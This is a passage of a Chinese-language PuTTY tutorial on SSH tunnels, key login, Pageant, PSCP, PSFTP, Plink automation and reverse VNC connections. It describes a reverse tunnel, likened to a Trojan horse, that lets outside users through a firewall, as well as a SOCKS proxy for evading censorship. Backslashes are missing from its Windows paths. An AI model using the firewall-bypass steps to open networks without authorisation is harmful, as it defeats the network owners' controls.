开始演练，我们现在建立一条到远程主机 guantouping 上端口 7001 的隧道，在 guantouping 上可以用 nc -l -p 7001 localhost 这条命令建立一个监听本地到端口 7001 的连接，这样确保无法从其他机器访问这台主机的端口，只能在 guantouping 这台主机上用 telnet localhost 7001 来连接。现在我的机器 IP 是 192.168.6.25，如果直接用命令 telnet guantouping 7001 访问的话，那么在主机 guantouping 上会看到这样的提示：

[taylor@guantouping taylor]$ nc -l -p 7001 localhost
invalid connection to [192.168.6.200] from (UNKNOWN) [192.168.6.25] 1926

在这个配置面板上， Source port 上填写 8080，也就是我们要通过本地的 8080 端口来进入 SSH 隧道， Destination 这里填上 127.0.0.1:7001，就表示被登录的主机 guantouping 访问该主机本地的 127.0.0.1:7001 这个端口。正常登录到主机 guantouping 以后，SSH 隧道就建立好了。在我的机器 192.168.6.25 上输入命令 telnet localhost 8080，输入一些东西，就会在 guantouping 上看到有响应。在这里我用的是 nc，看起来方便一点，telnet 也是一样的。

这就是正向 SSH 隧道的一个例子，大家实地操作几次也就会明白了。最上面有个复选框是“Local ports accept connections from other hosts”，这个选项的作用是允许其他主机连接你机器上的隧道入口，默认情况下建立好隧道以后，只允许本地链接。只有选中这个复选框才允许其他主机连接你的本地隧道入口。

象特洛伊木马一样建立一条 SSH 反向隧道

下面要说的就是选中单选按钮 Remote 后建立的反向 SSH 隧道，这样的隧道做什么用呢？一般防火墙都是允许从内往外链接，而不允许从外到内的链接，除非在防火墙上做好nat或端口转发。现在，你在防火墙的内部，但是又想让外面的人链接到你的机器上。防火墙厚厚的城门紧闭，外面的人进不来，只有你能从里面打开这扇防护严密的大门，就像一个特洛伊木马一样，你主动连接出去建立一个反向的 SSH 隧道，然后外面的人就可以通过这个反向的 SSH 隧道轻松突破防火墙链接到的你的本地机器。看下面这个图：

在 Source port 这里填写 8080，也就是隧道的入口是端口8080，Destination 这里填写 localhost:7001，也就是隧道的出口是本地的 7001 端口，下面的单选按钮要选中 Remote，表示建立的隧道是个反向隧道，填写完毕别忘记点 Add 按钮，在上面就可以看到显示的是 R8080 localhost:7001。成功登录远程主机 guantouping 后，反向隧道就建立好了。在远程主机 guantouping 上输入命令 telnet localhost 8080 就可以连接到你的本地端口7001。

哈哈，这样一个特洛伊木马般的反向 SSH 隧道就建立完毕了。我们在远程主机上连接 8080 端口，其实就连接到了我们本地机器的7001 端口了。上面共有两个复选框，我们提到了一个，已经说了，选中以后就允许其他机器连接隧道入口了。那第二个“Remote ports do the same (SSH-2 only)”，则是给反向隧道使用的，也就是说远程主机的那个反响隧道入口也做同样的事情，也就是允许其他机器连接远程主机上的反向隧道入口，不过一般情况下这个选项都不会起作用的 ^_^。

把 PuTTY 作为一个安全的代理服务器来使用

这个简单，在 Source port 那里填写上 1080，Destination 这里空下不填，选中下面的 Dynamic，最后别忘了点 Add 按钮。

登录远程主机后，一个代理服务器就建立好了，这个代理服务器的地址就是 localhost:1080，还是加密的哦。据说国外某著名的主机供应商就提供远程的 SSH 链接，通过这个方法我们就建立了一个加密的 socks5 代理，可以轻松绕过万恶的 GFW 去拥抱 Wikipedia，波～～～，来一口。

设置 PuTTY 的默认设置

每次登录主机，无一例外的修改字体，修改字符集，修改窗口的大小，指定私钥文件，允许 X11 转发，……
几台主机还好说，几十个上百个主机这样三天两头的设置也会让唐僧烦了的。
选中一个先前配置好的会话，点 Load 按钮。

然后修改Saved Sessions会话名称和 Host Name 这里的主机地址，点Save

如果在 Saved Sessions 这里和上面的 Host Name 清空，点 Save 按钮，就可以把设置保存为默认设置。

备份 PuTTY 的设置

用 PuTTY 最不爽的就是，它把所有的设置都保存到注册表了，本来这不是什么问题。但是难免会重装一下机器，用下面的命令可以备份 PuTTY 的所有设置

regedit /e PuTTY.config.reg "HKEY_CURRENT_USERSoftwareSimonTathamPuTTY"

删除 PuTTY 的设置

如果只是在其他机器上临时用了一个 PuTTY，用完以后想删除 PuTTY 的配置，就在控制台里输入如下的命令：

putty.exe -cleanup

用 PuTTYgen 来生成密钥，以后可以不用密码登录服务器了

PuTTYgen 是密钥生成器，用来生成一对公钥和私钥供 PuTTY、PSCP、Plink、Pagent 来使用。
直接运行 PuTTYgen 可以看到如下的界面。

点击 Generate 按钮就开始生成一个公钥和私钥对，生成完毕后，点下面的 Save private key 就可以把私钥保存起来，扩展名是 .ppk 的文件。
Load 按钮可以把先前保存的私钥重新打开，然后做些修改，比如修改注释和私钥口令，或者把 PuTTY 格式的私钥转换为 OpenSSH 格式的。

开始用 PuTTYgen 创建密钥

单击 Generate 按钮，然后你会看到进度条上面有个提示“Please generate some radomness by moving the mouse over the blank area.”，意思就是让你用鼠标在空白区域随机移动。随着鼠标在空白区域的移动，进度条会一直走下去。停止移动鼠标，进度条也就停止了。那我们就移动鼠标，直到进度条走满为止。

等进度条走完之后，会出现下面的界面

最上面那个大大的只读文本框里面是公钥，用来保存到 OpenSSH 的 authorized_keys 文件中，这个文件中的每一行都是一个公钥。默认情况下，这个文件位于 Linux 用户主目录的 .ssh/ 子目录中，如果文件和目录都不存在，可以直接创建。
但是创建的文件、目录和用户主目录（$HOME, $HOME/.ssh, $HOME/.ssh/authorized_keys）的权限有个限制就是对除了本帐户的其他所有帐户都要求是只读的，否则的话，即使公钥、私钥都匹配无误，也是无法登入系统的。这是 SSH 服务器的一个安全要求，因为如果别的帐户可以修改你的 authorized_keys 的话，恶意的增加一个公钥，那对方不用你的帐户口令也能以你的帐户登入系统了。对于一些特殊要求，你可以在 SSH 服务器的配置文件 sshd_config 中用指令

StrictModes no

来取消这个限制。在 sshd_config 的帮助手册中可以看到

StrictModes
Specifies whether sshd should check file modes and ownership of
the user’s files and home directory before accepting login. This
is normally desirable because novices sometimes accidentally
leave their directory or files world-writable. The default is
“yes”.

小技巧：每次修改 authorized_keys 这个文件时，你可以用如下的命令来修改，确保所有的文件属性和权限无误

mkdir -p $HOME/.ssh && touch $HOME/.ssh/authorized_keys
&& chmod go-w $HOME $HOME/.ssh $HOME/.ssh/authorized_keys && vim $HOME/.ssh/authorized_keys

还有一个要强调的是那个 Key comment，这是密钥的注释，一定要修改。因为这个密钥是给自己用的，所以最起码要输入自己的名字，用默认的注释很容易和其他人的密钥混淆的。如果担心自己的密码忘记了，可以在后面加上密码提示，当然了，不要让别人用注释猜出你的密钥口令。比如，我可以把注释修改为

ChaiFeng [20061120] w.z.

后面的 w.z. 就是我的密码提示，能猜出来么？呵呵

输入注释，上面的公钥也会随之发生变化。
现在最重要的是，输入自己的密钥口令。就是 Key passphrase 和 Confirm passphrase 这个两个输入框。
如果不输入口令，直接保存私钥会看到这个提示。为了安全起见还是输入口令吧，要不任何人得到这个私钥都可以不用口令登入系统了。

最后单击 Save private key 来保存私钥吧，保存到自己认为安全的地方，比如存放到私人的 USB 闪存盘上。需要登录时，插上 USB 闪存盘。登录完毕后就可以把 USB 闪存盘取下来，哈哈，这样子就比较安全了。
大家也注意到了，还有个 Save public key 按钮，这个是保存 SSH2 格式的公钥，有些 SSH 服务器要求用这种格式的公钥文件。一般情况下，我们是不需要的，所以这里也就保存了。以后还想的话，就用 PuTTYgen 把私钥 Load 出来，然后再保存也可以。

用密钥登录服务器的流程

上面杂七杂八的说了一堆创建密钥时的事情，大家会不会已经有些乱了呢？我把这个过程再罗列一遍：

如果没有公钥/密钥对，就用 PuTTYgen 创建一个，已经有了就可以忽略这一步。一个公钥/密钥对可以用在不同的服务器上，所以也不需要重复创建，关键要有足够强健的密码和安全的存放。
象先前一样输入帐户名和口令登录到主机上。
输入如下命令，来编辑 authorized_keys 文件
mkdir -p $HOME/.ssh && touch $HOME/.ssh/authorized_keys
&& chmod go-w $HOME $HOME/.ssh $HOME/.ssh/authorized_keys && vim $HOME/.ssh/authorized_keys
把

这个文本框里的公钥粘贴到 vim 中去，需要说明几点：这个文本框里的内容是一行的，粘贴到 vim 中时，别忘了按字母 o 这个键，否则的话，粘贴进去后，开头的 ssh-rsa 会变成 sh-rsa，为什么呢？哈哈，想想吧。
为什么不按字母键 i 呢？这个在 vim 中不就是插入么？原因是我很懒，按字母 o，我可以节省一次按回车键。虽然按大写 O 也行，那我不是还得再按一下 Shift 键么？
别忘了，在 PuTTY 中默认的粘贴可是按鼠标右键哦，然后按一下 ESC 键，然后输入 :wq 保存退出，等等，大家先别着急的输入 :wq，既然输入冒号还得按下 Shift 键，那我们就干脆直接两下大写的字母 Z，也就是 ZZ。怎么样？vim 也一样保存退出了吧。这次又节省了一次按键和两次寻找字母的移动，把懒得优良传统再一次在实践中发扬光大。
如果已经有了私钥，第4步里的那个公钥忘记保存了，就用 PuTTYgen 把这个私钥 Load 上去，然后重新复制一下公钥吧。
在 PuTTY 的配置 Connection->SSH->Auth 这里面，指定上私钥，然后记得保存 Session，以后就不需要重复这一步了。
最好也指定上自动登录的用户名，还记得这里吗？
开始登录吧，这次你会看到一个不同于以往的登录提示

现在输入的口令可不是主机上这个账户的口令了，而是先前创建的这个密钥的口令。以后不管这个账户的口令是什么，即使再复杂，也和我们没关系了。只要这个账户的 $HOME/.ssh/authorized_keys 文件中，有我们的公钥，我们就随时用匹配的私钥都可以登录了。配合后面提到的 Pagent，我们连输入密钥口令这一步也可以忽略过去。
登录成功了，别忘了按 Ctrl+d 注销哦。

以后这些步骤就不需要再重复了，只需要打开 PuTTY 后，双击一下保存的会话名称，输入密钥口令。

Pagent 加载密钥，每次开机后只需要输入一次密钥口令

终于轮到 Pagent 出场了，双击一下 Pagent.exe，嗯，没反应？再双击一下，咦？出来个提示，说已经运行了。

看看右下角吧，在这里呢

双击一下 Pagent 的图标，出来这样一个界面。很简洁的，Add Key 是添加私钥，Remove Key 是把选中的私钥从 Pagent 中卸载了。

好，现在单击 Add Key 按钮添加私钥，我把这个演示用的私钥保存到 C: 了

然后会出现输入密钥口令的对话框，输入正确的密钥后，单击 OK

这时，在 Pagent 的窗口中就能看到我们的私钥已经装载上去了。

现在打开 PuTTY，选择先前保存的 Session，双击一下。只要自动登录用户名设置上，主机上改帐户的 authorized_keys 文件里也有匹配的公钥。哈哈，发现没有？完全不需要口令，我们已经登录到系统了。
在 Pagent 的图标上点右键，也可以快捷的选择已经保存的会话。

建议大家把 Pagent 放到启动组里面，这样每次一开机，Pagent 自动运行，然后我们只需要把私钥装载一下，然后我们就可以一直享受自动登录系统的乐趣了。再配合上以后会讲到的 Plink、PSCP 这些，我们可以实现很多工作的自动化进行。完全不需要每次输入用户名、口令、输入又长又多的命令，再做一些烦躁的文件备份，最后还得记得注销系统，难道不觉得麻烦么？这一切烦恼很快就会远离我们了，继续往下看吧。

用 SSH 来传输文件

PuTTY 提供了两个文件传输工具

PSCP (PuTTY Secure Copy client)
PSFTP (PuTTY SFTP client)

PSCP 通过 SSH 连接，在两台机器之间安全的传输文件，可以用于任何 SSH（包括 SSH v1、SSH v2）服务器。
PSFTP 则是 SSH-2 中新增的特性，使用的是新的 SFTP 协议，使用上与传统的 FTP 类似。事实上 PSCP 如果发现 SFTP 可用，PSCP就会使用 SFTP 协议来传输文件，否则还是 SCP 协议。PSFTP 与 PSCP 相比，PSFTP 的优点是可以与服务器进行交互，遍历服务器上的文件系统，在一个会话中上传或下载多个文件。而 PSCP 只能一次传输一个文件，传输完毕后立刻终止会话。

PSCP 的使用

在控制台直接执行 pscp 可以看到帮助

C:>pscp
PuTTY Secure Copy client
Release 0.58
Usage: pscp [options] [user@]host:source target
pscp [options] source [source...] [user@]host:target
pscp [options] -ls [user@]host:filespec
Options:
-V print version information and exit
-pgpfp print PGP key fingerprints and exit
-p preserve file attributes
-q quiet, don't show statistics
-r copy directories recursively
-v show verbose messages
-load sessname Load settings from saved session
-P port connect to specified port
-l user connect with specified username
-pw passw login with specified password
-1 -2 force use of particular SSH protocol version
-4 -6 force use of IPv4 or IPv6
-C enable compression
-i key private key file for authentication
-batch disable all interactive prompts
-unsafe allow server-side wildcards (DANGEROUS)
-sftp force use of SFTP protocol
-scp force use of SCP protocol

C:>

可以看出 PSCP 的使用是很简单的，把常用的几个选项说一下：

-q 安静模式，传输文件时什么也不显示，否则会显示出文件的传输进度，默认是关闭的
-P port 指定服务器的 SSH 端口，注意这个是大写字母 P，默认是 -P 22，如果主机的 SSH 端口就是 22，就不用指定了
-l user 指定以哪个用户的身份登录主机，如果没有指定，则 PSCP 会在 PuTTY 保存的同名 Session 中获得默认的用户名称。用户名称也可以和主机名称写在一起，用 @ 分割开，比如：username@server
-pw passwd 指定登录时所用的口令为 passwd
-i keyfile 就是指定登录时所用的密钥文件
最后面指定的主机名也可以是 PuTTY 中保存的 Session 名称。比如我们在 PuTTY 中保存了一个名为 foobarserver 的会话，而我们所在的网络又的确没有名为 foobarserver 的主机名称。而在这个 foobarserver 会话中保存的主机名称是 demo-server，保存的自动登录的用户是 taylor。那么用命令
pscp c:autoexec.bat foobarserver:backup/
就把本地的 c:autoexec.bat 复制到了主机 demo-server 上的用户 taylor 所在的主目录下的 backup 子目录中（这个路径可能是 /home/taylor/backup

所以 PSCP 大致用法的例子就是：
pscp -P 22 -i c:pathyour-private-key.ppk -C username@server:/remote/path/
下面还是用一些实例来说明会比较简单一些：
把本地的 C:pathfoo.txt 复制到远程主机 192.168.6.200 的 /tmp 目录下

pscp c:pathfoo.txt 192.168.6.200:/tmp

把本地的 C:pathfoo.txt 复制到主机 192.168.6.200 的 /tmp 目录下，但是以主机上的用户 taylor 的权限执行

pscp c:pathfoo.txt taylor@192.168.6.200:/tmp

或者是

pscp -l taylor c:pathfoo.txt 192.168.6.200:/tmp

把本地的 C:pathfoo.txt 传送到主机 192.168.6.200 的 /tmp 目录下，但是主机的 SSH 端口是 3122

pscp -P 3122 c:pathfoo.txt 192.168.6.200:/tmp

把本地的 C:pathfoo.txt 复制到主机 192.168.6.200 的用户 taylor 的主目录下

pscp c:pathfoo.txt taylor@192.168.6.200:.

把主机 192.168.6.200 上的用户 taylor 主目录下的所有 *.tgz 文件拷贝到本地的 c:backup 目录中，如果 SSH 版本是 SSH v1，那这个命令就会出错。

pscp taylor@192.168.6.200:*.tgz c:backup

再来看看 PSFTP

在控制台执行命令 psftp -h，可以得到 psftp 的帮助

C:>psftp -h
PuTTY Secure File Transfer (SFTP) client
Release 0.58
Usage: psftp [options] [user@]host
Options:
-V print version information and exit
-pgpfp print PGP key fingerprints and exit
-b file use specified batchfile
-bc output batchfile commands
-be don't stop batchfile processing if errors
-v show verbose messages
-load sessname Load settings from saved session
-l user connect with specified username
-P port connect to specified port
-pw passw login with specified password
-1 -2 force use of particular SSH protocol version
-4 -6 force use of IPv4 or IPv6
-C enable compression
-i key private key file for authentication
-batch disable all interactive prompts

C:>

用法与 PSCP 大同小异，虽然有个 -load 选项，其实这个没啥用，后面用主机名的时候，与 PSCP 一样直接用上会话名称就可以了。
用 PSFTP 登录到服务器上以后，操作与 FTP 差不多，这里简单的说一下吧：

open 登录主机
open [username@]<sessname|hostname|ip> [port]
比如：
- open taylor@demo-server 3022
  就是以用户 taylor 的身份，登陆到主机 demo-server 上，SSH 端口是 3022
- open demo-server
  登陆 demo-server，这里的 demo-server 可以是PuTTY 中已经保存的会话名称，也可以是主机的名称，如果主机名称与会话名称相同，以会话名称为准。
close 关闭 SFTP 连接
这个没啥说的，close 就关闭了 SFTP 连接
quit 结束本次的 SFTP 会话
也没啥用法，就是关闭了 PSFTP 这个程序
help [command] 帮助
直接打 help 就可以看到帮助指令，后面指定上一个命令就可以查看该命令的帮助，比如： help open
cd [directory] 改变当前目录
pwd 察看当前目录
lcd [directory] 改变本地目录
lpwd 察看本地当前目录
get [-r] <filename|directory> 从服务器下载一个文件/目录，这个命令不能用通配符，参数 -r 可以递归下载整个目录
put [-r] <filename|directory> [dest] 把文件/目录上传到服务器，这个命令不能用通配符，参数 -r 可以递归上传整个目录
mget [-r] <filename|directory> 从服务器下载一批文件/目录，可以用通配符，-r 的含义与 get 一样
mget [-r] <filename|directory> [dest] 把一批文件/目录上传到服务器，可以用通配符，-r 的含义与 put 一样
reget [-r] <filename|directory> 从服务器续传下载一个文件/目录，这个命令不能用通配符，-r 的含义与 get 一样
reput [-r] <filename|directory> [dest] 把一批文件/目录续传上传到服务器，这个命令不能用通配符，-r 的含义与 put 一样
dir [directory] 列目录
ls 和 dir 一样
chmod [file|directory] 改变文件的权限，与 Unix 的 chmod 命令类似
del <filename> 删除文件，要注意的是 del 只能删除文件
rm 与 del 一样
mkdir <new-directory-name> 创建一个目录
rmdir <directory> 删除一个空目录，只有空目录才可以被删除
mv <source-file|source-directory> <dest-file|dest-directory> 改名/移动。如果源和目的都是文件或目录，则是改名。如果目的是目录的话，则是移动。
! 在本地命令前加一个感叹号，就可以直接执行

其他可选的 SFTP 客户端

FileZilla : http://filezilla.sf.net
WinSCP : http://www.winscp.net

用 Plink 更方便快捷的执行远程主机上的命令

Plink 是 PuTTY 的命令行连接工具，主要用于自动化工作的处理。
直接在控制台执行 plink，可以看到 Plink 的帮助

C:>plink
PuTTY Link: command-line connection utility
Release 0.58
Usage: plink [options] [user@]host [command]
("host" can also be a PuTTY saved session name)
Options:
-V print version information and exit
-pgpfp print PGP key fingerprints and exit
-v show verbose messages
-load sessname Load settings from saved session
-ssh -telnet -rlogin -raw
force use of a particular protocol
-P port connect to specified port
-l user connect with specified username
-batch disable all interactive prompts
The following options only apply to SSH connections:
-pw passw login with specified password
-D [listen-IP:]listen-port
Dynamic SOCKS-based port forwarding
-L [listen-IP:]listen-port:host:port
Forward local port to remote address
-R [listen-IP:]listen-port:host:port
Forward remote port to local address
-X -x enable / disable X11 forwarding
-A -a enable / disable agent forwarding
-t -T enable / disable pty allocation
-1 -2 force use of particular protocol version
-4 -6 force use of IPv4 or IPv6
-C enable compression
-i key private key file for authentication
-m file read remote command(s) from file
-s remote command is an SSH subsystem (SSH-2 only)
-N don't start a shell/command (SSH-2 only)

C:>

看上去 Plink 的使用方法、参数与PSCP、PSFTP都很类似。

-P port 指定服务器的 SSH 端口，注意这个是大写字母 P，默认是 -P 22，如果主机的 SSH 端口就是 22，就不用指定了
-l user 指定以哪个用户的身份登录主机，如果没有指定，则 PSCP 会在 PuTTY 保存的同名 Session 中获得默认的用户名称。用户名称也可以和主机名称写在一起，用 @ 分割开，比如：username@server
-pw passwd 指定登录时所用的口令为 passwd
-i keyfile 就是指定登录时所用的密钥文件
-m file 如果执行的命令很多的话，可以把命令写到文件中，然后用这个参数来指定

还是用一些实际的例子来说明一下 Plink 吧
还记得前面说到 PuTTY 的自动执行命令那个配置么？在说到那个配置的时候，我们演示了一个简单的 Tomcat 重新启动的命令，这个命令是要写在 PuTTY 的 Remote command 里面去。现在我们用 Plink 来实现同样的功能：
假设连接的主机是 192.168.6.200，SSH 的端口是 3022，用户是 taylor：

plink -P 3022 taylor@192.168.6.200 export CATALINA_HOME="~/apache-tomcat-5.5.17";export JAVA_HOME="~/jdk1.5.0_07";export PATH=$JAVA_HOME/bin;$PATH ; cd $CATALINA_HOME/bin;./shutdown.sh;./startup.sh;tail -f $CATALINA_HOME/logs/catalina.out

如果在 PuTTY 中保存了一个名为 192.168.6.200 的会话，注意，这个会话的名称与主机 IP 一样，在会话中已经正确保存了端口 3022，指定了默认的用户是 taylor，现在这个命令就可以简化为：

plink 192.168.6.200 export CATALINA_HOME="~/apache-tomcat-5.5.17";export JAVA_HOME="~/jdk1.5.0_07";export PATH=$JAVA_HOME/bin;$PATH ; cd $CATALINA_HOME/bin;./shutdown.sh;./startup.sh;tail -f $CATALINA_HOME/logs/catalina.out

用 date 命令查看一下主机上的时间，并且格式化输出：

plink 192.168.6.200 date "+%F %T"

大家实际执行一下命令看看，会发现，这个命令并没有返回我们期望的结果，而是返回了一个错误：

C:>plink 192.168.6.200 date "+%F %T"
date: too many non-option arguments: %T
Try `date --help' for more information.

可是在服务器上直接执行命令 date "+%F %T"，的确是正确无误的，哪里出了问题呢？这是因为Windows的控制台会把两个双引号之间的字符串作为一个参数传递给被执行的程序，而不会把双引号也传递给程序。我们做这样一个小小的实验来说明一下这个问题：
比如在 c:tmp 文件夹里建立三个文件夹，名称分别为："foo"、"bar"、"foo bar"。然后在 foo 这个文件夹里面建立一个名为“foo.log”的空文件，在“bar”这个文件夹里建立一个名为“bar.log”的空文件，在“foo bar”这个文件夹里建立一个名为“foo-bar.log”的空文件。
然后在控制台下进入 c:tmp 这个文件夹，执行如下命令：

dir foo bar

结果是列出“foo bar”这个文件夹里的内容，还是分别列出“foo”和“bar”文件夹里的东西呢？正确答案是后者。
要想正确列出“foo bar”文件夹里的东西，就需要用双引号把"foo bar"引起来

C:tmp>dir foo bar
Volume in drive C is System
Volume Serial Number is 9C51-A51C

Directory of C:tmpfoo

2006-11-22 09:48 <DIR> .
2006-11-22 09:48 <DIR> ..
2006-11-16 11:58 0 foo.log
1 File(s) 0 bytes

Directory of C:tmpbar

2006-11-22 09:48 <DIR> .
2006-11-22 09:48 <DIR> ..
2006-11-16 11:58 0 bar.log
1 File(s) 0 bytes
2 Dir(s) 1,107,345,408 bytes free

C:tmp>dir "foo bar"
Volume in drive C is System
Volume Serial Number is 9C51-A51C

Directory of C:tmpfoo bar

2006-11-22 09:48 <DIR> .
2006-11-22 09:48 <DIR> ..
2006-11-16 11:58 0 foo-bar.log
1 File(s) 0 bytes
2 Dir(s) 1,107,345,408 bytes free

C:tmp>

说到这里，就会明白上面的那个命令 plink 192.168.6.200 date "+%F %T" 其实在主机上执行的真实命令是 date +%F %T，而不是命令行中指定的 date "+%F %T"。不过还好，Windows 的控制台可不认得单引号，所以上面那个命令的正确用法应该是：

c:>plink 192.168.6.200 date '+%F %T'
2006-11-22 09:39:57

我经常需要登录到服务器上把 ADSL 重新拨号，可以把下面的命令写到一个文本文件中，比如保存到了 C:adsl-restart.command.txt

echo "stoping..."
/sbin/adsl-stop
echo "starting..."
/sbin/adsl-start
echo "done."
/sbin/adsl-status

然后执行如下命令：

plink -m c:adsl-restart.command.txt root@192.168.6.251

我经常要查看 Tomcat 的运行日志

plink taylor@192.168.6.200 tail -f ~/apache-tomcat-5.5.17/logs/catalina.out

每天都要看服务器上的剩余空间，就用这个命令：

plink taylor@192.168.6.200 df -k

假设 www.chaifeng.com 连接着另外一个网段 10.204.26.0，有台内网IP 为 10.204.26.21 的 Solaris 8主机只能用 telnet 登录，为了防止被监听，我们可以用 Plink 建立一个隧道，隧道开放 120 秒钟，如果隧道没有被使用，就自动断开连接，然后我们在本地就可以用命令 telnet localhost 2623 的安全登录那台 Solaris 8 主机了。

plink -L 2623:10.204.26.21:23 www.chaifeng.com sleep 120

在主机 www.chaifeng.com 上正在运行着 tor，默认的监听地址是 127.0.0.1:9050，用 Plink 建立一个隧道，然后浏览器上配置代理服务器为 127.0.0.1，端口是 9050，这样就能够安全的使用 tor 代理了，不用担心从我们的机器到主机 www.chaifeng.com 有被监听的可能了。

plink -C -N -L 9050:127.0.0.1:9050 taylor@www.chaifeng.com

结合上 PSCP 我们还可以完成文件的每天备份

plink taylor@192.168.6.200 tar jcf $(date '+documents.%F.tar.bz2') ~/documents
pscp taylor@192.168.6.200:$(date '+documents.%F.tar.bz2') c:backup
plink taylor@192.168.6.200 rm -f $(date '+documents.%F.tar.bz2')

如果把这些常用的操作写成批处理文件，到时候要重启一下 Tomcat，或者马上察看一下 Tomcat 日志，再或者只是要把 ADLS 重新拨号以下，只需要用鼠标一双击这个批处理文件，稍等一下就自动完成了。不比你打开 PuTTY，登录到服务器上，然后再一个一个的执行命令，最后还得注销来的方便快捷么？再懒一些，把自动备份的批处理放到计划任务里面，每天定时完成，哈哈，有时间上网找些好玩的东西了，不用每天忙于这些繁杂重复的命令中了。

用假象去迷惑敌人

如果我说 Google 的服务器也开放了 SSH，但是只有特定的 IP 可以连接上去，不信么？（声明：下面的图片都未经修改，我以 Google 的名义发誓，绝对没有 PS）

知道是怎么回事么？

Tips（小技巧）

安全、方便的使用 VNC，远程连接 VNC 不需要密码

有关 VNC 的主题按理说不应该写在这里，可是通过一点小小的技巧，可以让我们安全、方便的使用 VNC。我们多数情况下用 Windows 远程登录 Linux 桌面的方法不外乎 X11 forwarding 和 VNC，有关 X11 转发的内容参照前面的部分，还有关于 X11 转发和 VNC 哪个方便，这里就不再啰嗦说这些了，自己试一试就知道了。
在远程机器上启动 vnc 服务的方法很简单，直接使用命令 vncserver 了。如果是第一次使用这个命令，还会提示输入一个口令。注意了，这个口令是用来远程连接 VNC 服务端用的，不是登录口令，着两个口令可不一样。如果想修改 vnc 的连接口令，使用命令 vncpasswd 就可以搞定，用法和 passwd 一样。哎哎，等等。标题上不是写的“远程连接 VNC 不需要密码”么？为什么这里还是需要连接密码？不要着急，慢慢听我讲。前面说的方法就是最常用的方法了，既然连接 VNC 的时候需要密码，那就带来一个老问题。密码太简单了，容易被暴力破解掉。密码太复杂了，人脑毕竟不是电脑，记不住。但是呢，为了安全，密码还是要设置的长一点，我们可以使用一些其他工具帮助我们管理这些又臭又长的密码，比如 KeePass。
现在要说的是，我们可以把 VNC 的连接密码设置的好长好复杂，而且我们不用记，连接 VNC 的时候还不需要口令，不用担心暴力破解等等。我们需要做如下四步操作：
一、在本地机器上，用参数 /listen 来启动 vncviewer，这个参数对于 RealVNC、TightVNC、UltraVNC 的客户端都一样。也就是要把 VNC 客户端启动在监听模式下，我们要让 VNC 服务器主动连接我们，这样我们就不需要 VNC 的连接口令了。

vncviewer /listen

二、创建一个 PuTTY 的反向隧道，源端口 5500，目标 localhost:5500，具体操作看前面的部分，别忘记点“Add”按钮哦。这个 5500 端口就是 vncviewer 的默认监听端口。

三、在远程服务器上用命令 vncserver 启动 VNC 服务，如果前面已经启动 VNC 服务了，就忽略这一步。
四、关键命令哦，在远程服务器上执行命令

vncconfig -display :1 -connect localhost

说一下两个个关键参数，一个是 display 后面的 :1 ，这是连接到第一个 vnc 实例上。另一个就是 connect 参数后面的 localhost，既然我们是在远程机器上输入的这个命令，那很显然，连接的就是远程机器。别忘了，我们在此之前设置了反向的 SSH 隧道，连接远程机器的本地 5500 端口，其实连接的就是我们自己机器的 5500 端口。
哈，然后你就会发现什么密码也不用输入，就直接连接上远程的 VNC 服务了。不过呢，这四步操作确实有些麻烦，懒人的第一要旨就是能有多懒就要多懒。
第一步操作我们可以在 Windows 的启动菜单你里放一个 vncviewer 的快捷方式，别忘了 /listen 参数。
第二步操作可以直接保存到 PuTTY 的会话里面，参考前面的内容。
第三步就没啥子好说的，只要机器没有重启过，这个 VNC 服务就一直能用。
第四步的这个命令，我们可以在 PuTTY 的 Connection->SSH 的选项里的 “Remote command” 里填写上 “vncconfig -display :1 -connect localost” ，然后同样也是保存到 PuTTY 的会话里。以后只要双击一下那个 PuTTY 的会话，我们的 VNC 窗口就会自动打开。
第二步和第四步操作也可以用一个命令来代替，如下：

plink.exe -R 5500:localhost:5500 guantouping "vncconfig -display :1 -connect localhost"

命令参数中的那个 “guantouping” 是 PuTTY 保存的会话名，也可以是远程机器主机名，把这个命令做成一个快捷方式，双击直接打开 VNC。

FAQ（常见问题）

我在 PuTTY 官方网站下载的，可是执行 PuTTY、Pagent、PuTTYgen 时总是出错，而命令行执行的这几个却没问题

这种情形我也碰到过，一个解决的办法就是去下载最新版，或许你碰巧下载的是旧版本。另外一个解决办法就是，创建三个扩展名为 .manifest 的文本文件，然后把这三个文件复制到 PuTTY 的目录中，文件内容分别如下：
把下面的内容复制到记事本中，文件名保存为：PAGEANT.exe.manifest

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>

<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity
type="win32"
name="Pageant"
version="0.0.0.0" processorArchitecture="x86"/>
<dependency>
<dependentAssembly>

<assemblyIdentity type="win32"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
language="*"
processorArchitecture="x86"/>
</dependentAssembly>
</dependency>
</assembly>

把下面的内容复制到记事本中，文件名保存为：PUTTY.exe.manifest

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>

<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity
type="win32"
name="PuTTY"
version="0.0.0.0" processorArchitecture="x86"/>
<dependency>
<dependentAssembly>

<assemblyIdentity type="win32"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
language="*"
processorArchitecture="x86"/>
</dependentAssembly>
</dependency>
</assembly>

把下面的内容复制到记事本中，文件名保存为：PUTTYGEN.exe.manifest

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>

<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity
type="win32"
name="PuTTYgen"
version="0.0.0.0" processorArchitecture="x86"/>
<dependency>
<dependentAssembly>

<assemblyIdentity type="win32"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
language="*"
processorArchitecture="x86"/>
</dependentAssembly>
</dependency>
</assembly>

屏幕输出太快了，怎么能暂停一下？

Ctrl+S 快捷键可以暂停终端，Ctrl+Q 恢复。

怎么翻页？

Shift+PageUp/PageDown 一页一页的翻，Ctrl+PageUp/PageDown 则是一行一行的。

不是说 PSCP 一次只能传输一个文件么？为什么我发现能传输很多个？

那是因为 PSCP 发现 SFTP 协议可用，优先使用 SFTP 协议来传输文件

为什么执行了 pscp、psftp、plink 这些命令总是说错误的命令呢？

应该把 PuTTY 所在的路径添加到 PATH 环境变量中。你可以编辑 c:autoexec.bat 这个文件，在最后增加一行，把 c:pathtoputty 换成你的真实路径

set PATH=c:pathtoputty;%PATH%

在登录的时候出现 "Proxy error: 407 Proxy authorization require" 的错误提示

